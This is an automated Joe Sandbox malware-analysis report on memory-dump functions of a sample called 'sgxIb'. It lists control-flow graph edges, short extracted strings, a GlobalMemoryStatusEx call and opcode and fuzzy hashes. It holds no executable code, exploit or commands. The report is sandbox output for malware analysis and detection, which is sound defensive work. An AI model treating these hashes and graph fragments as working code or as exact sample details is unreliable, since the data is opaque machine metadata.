                                        control_flow_graph 322 6f1d070-6f1d08b 323 6f1d08d-6f1d090 322->323 324 6f1d092-6f1d0a1 323->324 325 6f1d0d9-6f1d0dc 323->325 326 6f1d0b0-6f1d0bc 324->326 327 6f1d0a3-6f1d0a8 324->327 328 6f1d125-6f1d128 325->328 329 6f1d0de-6f1d120 325->329 330 6f1d0c2-6f1d0d4 326->330 331 6f1da8d-6f1dac6 326->331 327->326 332 6f1d137-6f1d13a 328->332 333 6f1d12a-6f1d12c 328->333 329->328 330->325 347 6f1dac8-6f1dacb 331->347 336 6f1d144-6f1d147 332->336 337 6f1d13c-6f1d141 332->337 334 6f1d132 333->334 335 6f1d559 333->335 334->332 342 6f1d55c-6f1d568 335->342 340 6f1d190-6f1d193 336->340 341 6f1d149-6f1d18b 336->341 337->336 344 6f1d195-6f1d1d7 340->344 345 6f1d1dc-6f1d1df 340->345 341->340 342->324 346 6f1d56e-6f1d85b 342->346 344->345 349 6f1d1e1-6f1d223 345->349 350 6f1d228-6f1d22b 345->350 535 6f1d861-6f1d867 346->535 536 6f1da82-6f1da8c 346->536 352 6f1dacd-6f1dae9 347->352 353 6f1daee-6f1daf1 347->353 349->350 357 6f1d274-6f1d277 350->357 358 6f1d22d-6f1d26f 350->358 352->353 354 6f1daf3-6f1db1f 353->354 355 6f1db24-6f1db27 353->355 354->355 362 6f1db36-6f1db38 355->362 363 6f1db29 355->363 364 6f1d2c0-6f1d2c3 357->364 365 6f1d279-6f1d288 357->365 358->357 372 6f1db3a 362->372 373 6f1db3f-6f1db42 362->373 582 6f1db29 call 6f1dbf1 363->582 583 6f1db29 call 6f1dbe5 363->583 370 6f1d2d2-6f1d2d5 364->370 371 6f1d2c5-6f1d2c7 364->371 375 6f1d297-6f1d2a3 365->375 376 6f1d28a-6f1d28f 365->376 380 6f1d2f2-6f1d2f5 370->380 381 6f1d2d7-6f1d2ed 370->381 378 6f1d417-6f1d420 371->378 379 6f1d2cd 371->379 372->373 373->347 386 6f1db44-6f1db53 373->386 375->331 387 6f1d2a9-6f1d2bb 375->387 376->375 393 6f1d422-6f1d427 378->393 394 6f1d42f-6f1d43b 378->394 379->370 389 6f1d2f7-6f1d339 380->389 390 6f1d33e-6f1d341 380->390 381->380 385 6f1db2f-6f1db31 385->362 410 6f1db55-6f1dbb8 call 6f166b8 386->410 411 6f1dbba-6f1dbcf 386->411 387->364 389->390 399 6f1d343-6f1d35f 390->399 400 6f1d364-6f1d367 390->400 393->394 401 6f1d441-6f1d455 394->401 402 6f1d54c-6f1d551 394->402 399->400 400->342 408 6f1d36d-6f1d370 400->408 401->335 427 6f1d45b-6f1d46d 401->427 402->335 418 6f1d372-6f1d3b4 408->418 419 6f1d3b9-6f1d3bc 408->419 410->411 431 6f1dbd0 411->431 418->419 422 6f1d405-6f1d407 419->422 423 6f1d3be-6f1d400 419->423 432 6f1d409 422->432 433 6f1d40e-6f1d411 422->433 423->422 443 6f1d491-6f1d493 427->443 444 6f1d46f-6f1d475 427->444 431->431 432->433 433->323 433->378 453 6f1d49d-6f1d4a9 443->453 445 6f1d477 444->445 446 6f1d479-6f1d485 444->446 452 6f1d487-6f1d48f 445->452 446->452 452->453 463 6f1d4b7 453->463 464 6f1d4ab-6f1d4b5 453->464 468 6f1d4bc-6f1d4be 463->468 464->468 468->335 471 6f1d4c4-6f1d4e0 call 6f166b8 468->471 480 6f1d4e2-6f1d4e7 471->480 481 6f1d4ef-6f1d4fb 471->481 480->481 481->402 483 6f1d4fd-6f1d54a 481->483 483->335 537 6f1d876-6f1d87f 535->537 538 6f1d869-6f1d86e 535->538 537->331 539 6f1d885-6f1d898 537->539 538->537 541 6f1da72-6f1da7c 539->541 542 6f1d89e-6f1d8a4 539->542 541->535 541->536 543 6f1d8b3-6f1d8bc 542->543 544 6f1d8a6-6f1d8ab 542->544 543->331 545 6f1d8c2-6f1d8e3 543->545 544->543 548 6f1d8f2-6f1d8fb 545->548 549 6f1d8e5-6f1d8ea 545->549 548->331 550 6f1d901-6f1d91e 548->550 549->548 550->541 553 6f1d924-6f1d92a 550->553 553->331 554 6f1d930-6f1d949 553->554 556 6f1da65-6f1da6c 554->556 557 6f1d94f-6f1d976 554->557 556->541 556->553 557->331 560 6f1d97c-6f1d986 557->560 560->331 561 6f1d98c-6f1d9a3 560->561 563 6f1d9b2-6f1d9cd 561->563 564 6f1d9a5-6f1d9b0 561->564 563->556 569 6f1d9d3-6f1d9ec call 6f166b8 563->569 564->563 573 6f1d9fb-6f1da04 569->573 574 6f1d9ee-6f1d9f3 569->574 573->331 575 6f1da0a-6f1da5e 573->575 574->573 575->556 582->385 583->385
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q
                                        • API String ID: 0-831282457
                                        • Opcode ID: 9c381caccf10efe06633e144a97acefd1290683ec895df0044e0c1534e0e4c4b
                                        • Instruction ID: 077f133a44631220cb2a3e0003e7fbf2b197bb7830f1b1c72c71488ffcaa48cf
                                        • Opcode Fuzzy Hash: 9c381caccf10efe06633e144a97acefd1290683ec895df0044e0c1534e0e4c4b
                                        • Instruction Fuzzy Hash: 21624130A002068FCB55EF69D590A5DBBF2FF84354F108A69D4099F369DB75ED8ACB80
                                        Function 06F14C80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 584 6f14c80-6f14ca4 585 6f14ca6-6f14ca9 584->585 586 6f14cab-6f14cc5 585->586 587 6f14cca-6f14ccd 585->587 586->587 588 6f14cd3-6f14dcb 587->588 589 6f153ac-6f153ae 587->589 607 6f14dd1-6f14e1e call 6f15537 588->607 608 6f14e4e-6f14e55 588->608 591 6f153b0 589->591 592 6f153b5-6f153b8 589->592 591->592 592->585 593 6f153be-6f153cb 592->593 621 6f14e24-6f14e40 607->621 609 6f14ed9-6f14ee2 608->609 610 6f14e5b-6f14ecb 608->610 609->593 627 6f14ed6 610->627 628 6f14ecd 610->628 624 6f14e42 621->624 625 6f14e4b 621->625 624->625 625->608 627->609 628->627
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq$\Ocq
                                        • API String ID: 0-3575482020
                                        • Opcode ID: f4ed9b10f2a4c39463f6877633bdccab53d7a771d4481ac6a4c034ef0325cccb
                                        • Instruction ID: 3d32d4191a3020fa0099b0f0e23bf7937a68f05b1802d486000bfa34af108c84
                                        • Opcode Fuzzy Hash: f4ed9b10f2a4c39463f6877633bdccab53d7a771d4481ac6a4c034ef0325cccb
                                        • Instruction Fuzzy Hash: 14619D30F002099FEB55DFA9C8547AEBBF6FBC8750F208429D10AAB394DB758D458B91
                                        Function 06F18190 Relevance: 2.7, Strings: 2, Instructions: 248COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1165 6f18190-6f181af 1166 6f181b1-6f181b4 1165->1166 1167 6f183e9-6f183ec 1166->1167 1168 6f181ba-6f181c9 1166->1168 1169 6f1840f-6f18412 1167->1169 1170 6f183ee-6f1840a 1167->1170 1174 6f181e8-6f1822c 1168->1174 1175 6f181cb-6f181e6 1168->1175 1172 6f18418-6f18424 1169->1172 1173 6f184bd-6f184bf 1169->1173 1170->1169 1179 6f1842f-6f18431 1172->1179 1177 6f184c1 1173->1177 1178 6f184c6-6f184c9 1173->1178 1190 6f18232-6f18243 1174->1190 1191 6f183bd-6f183d3 1174->1191 1175->1174 1177->1178 1178->1166 1180 6f184cf-6f184d8 1178->1180 1181 6f18433-6f18439 1179->1181 1182 6f18449-6f1844d 1179->1182 1186 6f1843b 1181->1186 1187 6f1843d-6f1843f 1181->1187 1188 6f1845b 1182->1188 1189 6f1844f-6f18459 1182->1189 1186->1182 1187->1182 1192 6f18460-6f18462 1188->1192 1189->1192 1199 6f18249-6f18266 1190->1199 1200 6f183a8-6f183b7 1190->1200 1191->1167 1195 6f18473-6f184ac 1192->1195 1196 6f18464-6f18467 1192->1196 1195->1168 1210 6f184b2-6f184bc 1195->1210 1196->1180 1199->1200 1206 6f1826c-6f18362 call 6f166b8 1199->1206 1200->1190 1200->1191 1233 6f18370 1206->1233 1234 6f18364-6f1836e 1206->1234 1235 6f18375-6f18377 1233->1235 1234->1235 1235->1200 1236 6f18379-6f1837e 1235->1236 1237 6f18380-6f1838a 1236->1237 1238 6f1838c 1236->1238 1239 6f18391-6f18393 1237->1239 1238->1239 1239->1200 1240 6f18395-6f183a1 1239->1240 1240->1200
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 90a49d21e423748856d0c01fd1fc86d09b04114c36087b672a68c735dce09f3b
                                        • Instruction ID: ba7121169cc946f14a579be2851c97309228873e9cc8327a7669d0bc2ca86ae6
                                        • Opcode Fuzzy Hash: 90a49d21e423748856d0c01fd1fc86d09b04114c36087b672a68c735dce09f3b
                                        • Instruction Fuzzy Hash: 1D91AC31F002068FDB54DB79EA5066EB3E6FF84284F148428D81ADB394DF75EC868B81
                                        Function 06F008D9 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1242 6f008d9-6f008f7 1243 6f00ab2-6f00ad6 1242->1243 1244 6f008fd-6f00906 1242->1244 1249 6f00add-6f00b22 1243->1249 1248 6f0090c-6f00961 1244->1248 1244->1249 1257 6f00963-6f00988 1248->1257 1258 6f0098b-6f00994 1248->1258 1257->1258 1259 6f00996 1258->1259 1260 6f00999-6f009ab call 6f00b28 1258->1260 1259->1260 1264 6f009b1-6f009b3 1260->1264 1266 6f009b5-6f009ba 1264->1266 1267 6f00a0d-6f00a5a 1264->1267 1268 6f009f3-6f00a06 1266->1268 1269 6f009bc-6f009f1 1266->1269 1276 6f00a61-6f00a66 1267->1276 1268->1267 1269->1276 1278 6f00a70-6f00a75 1276->1278 1279 6f00a68 1276->1279 1281 6f00a77 1278->1281 1282 6f00a7f-6f00a84 1278->1282 1279->1278 1281->1282 1283 6f00a86-6f00a91 1282->1283 1284 6f00a99 1282->1284 1283->1284 1284->1243
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q$(bq
                                        • API String ID: 0-1294341849
                                        • Opcode ID: e938070a07280e2b161aa8749fec924ef5a3b08120361ce236b985a2b867f2e9
                                        • Instruction ID: 155dcecab276a7dde4d4e6ca9608d5b047daf6399468f729dae32aa308d82abb
                                        • Opcode Fuzzy Hash: e938070a07280e2b161aa8749fec924ef5a3b08120361ce236b985a2b867f2e9
                                        • Instruction Fuzzy Hash: 38517F31F002198FDB55EFB9C85069EBBF2AF84740F248569D405AB384DE34AD46CB91
                                        Function 06F19267 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1291 6f19267-6f1928d 1292 6f1928f-6f19292 1291->1292 1293 6f19294-6f192b3 1292->1293 1294 6f192b8-6f192bb 1292->1294 1293->1294 1295 6f192c1-6f192d6 1294->1295 1296 6f19b7b-6f19b7d 1294->1296 1303 6f192d8-6f192de 1295->1303 1304 6f192ee-6f19304 1295->1304 1298 6f19b84-6f19b87 1296->1298 1299 6f19b7f 1296->1299 1298->1292 1301 6f19b8d-6f19b97 1298->1301 1299->1298 1305 6f192e0 1303->1305 1306 6f192e2-6f192e4 1303->1306 1308 6f1930f-6f19311 1304->1308 1305->1304 1306->1304 1309 6f19313-6f19319 1308->1309 1310 6f19329-6f1939a 1308->1310 1311 6f1931b 1309->1311 1312 6f1931d-6f1931f 1309->1312 1321 6f193c6-6f193e2 1310->1321 1322 6f1939c-6f193bf 1310->1322 1311->1310 1312->1310 1327 6f193e4-6f19407 1321->1327 1328 6f1940e-6f19429 1321->1328 1322->1321 1327->1328 1333 6f19454-6f1946f 1328->1333 1334 6f1942b-6f1944d 1328->1334 1339 6f19471-6f19493 1333->1339 1340 6f1949a-6f194a4 1333->1340 1334->1333 1339->1340 1341 6f194b4-6f1952e 1340->1341 1342 6f194a6-6f194af 1340->1342 1348 6f19530-6f1954e 1341->1348 1349 6f1957b-6f19590 1341->1349 1342->1301 1353 6f19550-6f1955f 1348->1353 1354 6f1956a-6f19579 1348->1354 1349->1296 1353->1354 1354->1348 1354->1349
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 19f1f6447fedbce45d932fcc3c147a49ecf517b3a4eb5a7e02ea8958ccbaa17d
                                        • Instruction ID: e2e62ef5bf544636250c3eeeec81cf06dad2258acb90f048bb9294990dd40ba1
                                        • Opcode Fuzzy Hash: 19f1f6447fedbce45d932fcc3c147a49ecf517b3a4eb5a7e02ea8958ccbaa17d
                                        • Instruction Fuzzy Hash: 7F514F70B00206DFDF54DB68E9A076EB3FAEBC8644F108469C409DB394DA74DC428B95
                                        Function 06F14C7B Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1357 6f14c7b-6f14ca4 1359 6f14ca6-6f14ca9 1357->1359 1360 6f14cab-6f14cc5 1359->1360 1361 6f14cca-6f14ccd 1359->1361 1360->1361 1362 6f14cd3-6f14dcb 1361->1362 1363 6f153ac-6f153ae 1361->1363 1381 6f14dd1-6f14e1e call 6f15537 1362->1381 1382 6f14e4e-6f14e55 1362->1382 1365 6f153b0 1363->1365 1366 6f153b5-6f153b8 1363->1366 1365->1366 1366->1359 1367 6f153be-6f153cb 1366->1367 1395 6f14e24-6f14e40 1381->1395 1383 6f14ed9-6f14ee2 1382->1383 1384 6f14e5b-6f14ecb 1382->1384 1383->1367 1401 6f14ed6 1384->1401 1402 6f14ecd 1384->1402 1398 6f14e42 1395->1398 1399 6f14e4b 1395->1399 1398->1399 1399->1382 1401->1383 1402->1401
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq
                                        • API String ID: 0-936005338
                                        • Opcode ID: 77bd25fa12c75d9a6a9a2d747896879663a5bbddcb7f5be4f550185fa95ac612
                                        • Instruction ID: 3b68fa1e89031d714a174cbb0cba3e2c3f3e8d8c8346974cd760af0f81244aae
                                        • Opcode Fuzzy Hash: 77bd25fa12c75d9a6a9a2d747896879663a5bbddcb7f5be4f550185fa95ac612
                                        • Instruction Fuzzy Hash: 26517F30F002199FEB55DFB9C854BAEBAE6FBC8710F208529D106AF395DA758C018B91
                                        Function 06F159D8 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2098 6f159d8-6f159fc 2099 6f159fe-6f15a01 2098->2099 2100 6f15a03-6f15a0a 2099->2100 2101 6f15a0f-6f15a12 2099->2101 2100->2101 2102 6f15a18-6f15bac 2101->2102 2103 6f15cfb-6f15cfe 2101->2103 2158 6f15bb2-6f15bb9 2102->2158 2159 6f15ce5-6f15cf8 2102->2159 2104 6f15d00-6f15d13 2103->2104 2105 6f15d16-6f15d19 2103->2105 2107 6f15d33-6f15d36 2105->2107 2108 6f15d1b-6f15d2c 2105->2108 2110 6f15d50-6f15d53 2107->2110 2111 6f15d38-6f15d49 2107->2111 2117 6f15d7b-6f15d82 2108->2117 2118 6f15d2e 2108->2118 2110->2102 2112 6f15d59-6f15d5c 2110->2112 2116 6f15d5e-6f15d6f 2111->2116 2122 6f15d4b 2111->2122 2115 6f15d76-6f15d79 2112->2115 2112->2116 2115->2117 2121 6f15d87-6f15d8a 2115->2121 2116->2117 2125 6f15d71 2116->2125 2117->2121 2118->2107 2121->2102 2124 6f15d90-6f15d93 2121->2124 2122->2110 2127 6f15db1-6f15db4 2124->2127 2128 6f15d95-6f15da6 2124->2128 2125->2115 2129 6f15db6-6f15dc7 2127->2129 2130 6f15dce-6f15dd1 2127->2130 2128->2104 2138 6f15dac 2128->2138 2129->2117 2139 6f15dc9 2129->2139 2131 6f15dd3-6f15dd8 2130->2131 2132 6f15ddb-6f15ddd 2130->2132 2131->2132 2136 6f15de4-6f15de7 2132->2136 2137 6f15ddf 2132->2137 2136->2099 2140 6f15ded-6f15df6 2136->2140 2137->2136 2138->2127 2139->2130 2160 6f15c6d-6f15c74 2158->2160 2161 6f15bbf-6f15be2 2158->2161 2160->2159 2163 6f15c76-6f15ca9 2160->2163 2170 6f15bea-6f15bf2 2161->2170 2174 6f15cab 2163->2174 2175 6f15cae-6f15cdb 2163->2175 2171 6f15bf4 2170->2171 2172 6f15bf7-6f15c38 2170->2172 2171->2172 2183 6f15c50-6f15c61 2172->2183 2184 6f15c3a-6f15c4b 2172->2184 2174->2175 2175->2140 2175->2159 2183->2140 2184->2140
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: 099326586df2d6cb92efd3c09a96c2cdc9a294232d54e36159b1fb9e5a55b02e
                                        • Instruction ID: 46d54e28331b9813869e2192194632736c8bc442715f92fad4aadd5cdce968e0
                                        • Opcode Fuzzy Hash: 099326586df2d6cb92efd3c09a96c2cdc9a294232d54e36159b1fb9e5a55b02e
                                        • Instruction Fuzzy Hash: BFC1A975F002198FDB54EFA4C49869EB7F6FF88364F208469D806AB354DA31DD42CB91
                                        Function 0302EE21 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2187 302ee21-302ee23 2188 302ee2d-302ee39 2187->2188 2190 302ee3b-302ee3e 2188->2190 2191 302ee3f-302ee54 2188->2191 2193 302ee10 2191->2193 2194 302ee56-302ee96 2191->2194 2193->2187 2196 302ee9e-302eecc GlobalMemoryStatusEx 2194->2196 2197 302eed5-302eefd 2196->2197 2198 302eece-302eed4 2196->2198 2198->2197
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0302EEBF
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1960997574.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_3020000_sgxIb.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: d7a3897c9995bce0023dc20ee3042eb56363ba005898c097353ad8fe6f97fae7
                                        • Instruction ID: 4cd0cb0233666440e9fb8027f0a96d0ccc0ceff2a7fc99fcc743727a869197d4
                                        • Opcode Fuzzy Hash: d7a3897c9995bce0023dc20ee3042eb56363ba005898c097353ad8fe6f97fae7
                                        • Instruction Fuzzy Hash: CF2178B1C006698FDB10DFAAD4447DEBBF5EF48320F148A6AD458A7290D7789981CBA1
                                        Function 0302EE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2201 302ee58-302eecc GlobalMemoryStatusEx 2203 302eed5-302eefd 2201->2203 2204 302eece-302eed4 2201->2204 2204->2203
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0302EEBF
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1960997574.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_3020000_sgxIb.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: a41e5872f8cbeb975674f727eefed502c9d582a696d4b0e088e5e85aac994cdc
                                        • Instruction ID: 83c7942ecdaa0aabd2be333466f5a1b14b3e56333d1678ae235290cf84f42cca
                                        • Opcode Fuzzy Hash: a41e5872f8cbeb975674f727eefed502c9d582a696d4b0e088e5e85aac994cdc
                                        • Instruction Fuzzy Hash: DD11F0B1C006699BCB10DF9AC544BDEFBF4AF48320F14816AD858B7251D778A944CFA5
                                        Function 06F159D7 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2207 6f159d7-6f159fc 2209 6f159fe-6f15a01 2207->2209 2210 6f15a03-6f15a0a 2209->2210 2211 6f15a0f-6f15a12 2209->2211 2210->2211 2212 6f15a18-6f15bac 2211->2212 2213 6f15cfb-6f15cfe 2211->2213 2268 6f15bb2-6f15bb9 2212->2268 2269 6f15ce5-6f15cf8 2212->2269 2214 6f15d00-6f15d13 2213->2214 2215 6f15d16-6f15d19 2213->2215 2217 6f15d33-6f15d36 2215->2217 2218 6f15d1b-6f15d2c 2215->2218 2220 6f15d50-6f15d53 2217->2220 2221 6f15d38-6f15d49 2217->2221 2227 6f15d7b-6f15d82 2218->2227 2228 6f15d2e 2218->2228 2220->2212 2222 6f15d59-6f15d5c 2220->2222 2226 6f15d5e-6f15d6f 2221->2226 2232 6f15d4b 2221->2232 2225 6f15d76-6f15d79 2222->2225 2222->2226 2225->2227 2231 6f15d87-6f15d8a 2225->2231 2226->2227 2235 6f15d71 2226->2235 2227->2231 2228->2217 2231->2212 2234 6f15d90-6f15d93 2231->2234 2232->2220 2237 6f15db1-6f15db4 2234->2237 2238 6f15d95-6f15da6 2234->2238 2235->2225 2239 6f15db6-6f15dc7 2237->2239 2240 6f15dce-6f15dd1 2237->2240 2238->2214 2248 6f15dac 2238->2248 2239->2227 2249 6f15dc9 2239->2249 2241 6f15dd3-6f15dd8 2240->2241 2242 6f15ddb-6f15ddd 2240->2242 2241->2242 2246 6f15de4-6f15de7 2242->2246 2247 6f15ddf 2242->2247 2246->2209 2250 6f15ded-6f15df6 2246->2250 2247->2246 2248->2237 2249->2240 2270 6f15c6d-6f15c74 2268->2270 2271 6f15bbf-6f15be2 2268->2271 2270->2269 2273 6f15c76-6f15ca9 2270->2273 2280 6f15bea-6f15bf2 2271->2280 2284 6f15cab 2273->2284 2285 6f15cae-6f15cdb 2273->2285 2281 6f15bf4 2280->2281 2282 6f15bf7-6f15c38 2280->2282 2281->2282 2293 6f15c50-6f15c61 2282->2293 2294 6f15c3a-6f15c4b 2282->2294 2284->2285 2285->2250 2285->2269 2293->2250 2294->2250
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: fd761be782946720f12f110c1cd7e85bc8e82e647316b96052995f67d4425dc8
                                        • Instruction ID: 664d5e00f12181662cbb85d1008e27b79867052ba87701158d2638154b42dfd1
                                        • Opcode Fuzzy Hash: fd761be782946720f12f110c1cd7e85bc8e82e647316b96052995f67d4425dc8
                                        • Instruction Fuzzy Hash: D5815775E002199FDB05DFA4C994ADEBBF2BF88724F208169D406BB354DA31AD42CB91
                                        Function 06F159CF Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2372 6f159cf-6f159d0 2373 6f15a00-6f15a0a 2372->2373 2374 6f159d2 2372->2374 2375 6f15a0f-6f15a12 2373->2375 2374->2373 2376 6f15a18-6f15bac 2375->2376 2377 6f15cfb-6f15cfe 2375->2377 2434 6f15bb2-6f15bb9 2376->2434 2435 6f15ce5-6f15cf8 2376->2435 2378 6f15d00-6f15d13 2377->2378 2379 6f15d16-6f15d19 2377->2379 2381 6f15d33-6f15d36 2379->2381 2382 6f15d1b-6f15d2c 2379->2382 2384 6f15d50-6f15d53 2381->2384 2385 6f15d38-6f15d49 2381->2385 2391 6f15d7b-6f15d82 2382->2391 2392 6f15d2e 2382->2392 2384->2376 2386 6f15d59-6f15d5c 2384->2386 2390 6f15d5e-6f15d6f 2385->2390 2396 6f15d4b 2385->2396 2389 6f15d76-6f15d79 2386->2389 2386->2390 2389->2391 2395 6f15d87-6f15d8a 2389->2395 2390->2391 2399 6f15d71 2390->2399 2391->2395 2392->2381 2395->2376 2398 6f15d90-6f15d93 2395->2398 2396->2384 2401 6f15db1-6f15db4 2398->2401 2402 6f15d95-6f15da6 2398->2402 2399->2389 2403 6f15db6-6f15dc7 2401->2403 2404 6f15dce-6f15dd1 2401->2404 2402->2378 2412 6f15dac 2402->2412 2403->2391 2413 6f15dc9 2403->2413 2405 6f15dd3-6f15dd8 2404->2405 2406 6f15ddb-6f15ddd 2404->2406 2405->2406 2410 6f15de4-6f15de7 2406->2410 2411 6f15ddf 2406->2411 2414 6f15ded-6f15df6 2410->2414 2415 6f159fe-6f15a01 2410->2415 2411->2410 2412->2401 2413->2404 2415->2375 2417 6f15a03-6f15a0a 2415->2417 2417->2375 2436 6f15c6d-6f15c74 2434->2436 2437 6f15bbf-6f15be2 2434->2437 2436->2435 2439 6f15c76-6f15ca9 2436->2439 2446 6f15bea-6f15bf2 2437->2446 2450 6f15cab 2439->2450 2451 6f15cae-6f15cdb 2439->2451 2447 6f15bf4 2446->2447 2448 6f15bf7-6f15c38 2446->2448 2447->2448 2459 6f15c50-6f15c61 2448->2459 2460 6f15c3a-6f15c4b 2448->2460 2450->2451 2451->2414 2451->2435 2459->2414 2460->2414
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: a809bd6f61669f2e957867c8b3a41e331debad93eb5d4b0a5501d4e656535175
                                        • Instruction ID: 76f3613b7f0248149db89ff701d7623b3b3d51e4f09d7d5575c69169b5d0a7ba
                                        • Opcode Fuzzy Hash: a809bd6f61669f2e957867c8b3a41e331debad93eb5d4b0a5501d4e656535175
                                        • Instruction Fuzzy Hash: 1F715975E002199FDB05DFA4C954ADEBBF2BF88724F208169D405BB394DB31AD42CB91
                                        Function 06F00108 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: d4b8ae742e600933926827bc4bdb1bbddf58d41e121d936616ad9a8ec7f2a30e
                                        • Instruction ID: 80581e1d3826d5766a0ba338d7f61be4511e243dd717afeace9c28cc9f813929
                                        • Opcode Fuzzy Hash: d4b8ae742e600933926827bc4bdb1bbddf58d41e121d936616ad9a8ec7f2a30e
                                        • Instruction Fuzzy Hash: 1241C031F102058FEF956AB494647AE77A2EBC8224F24486AD406EB3C4EE34DD82D791
                                        Function 06F1DBE5 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
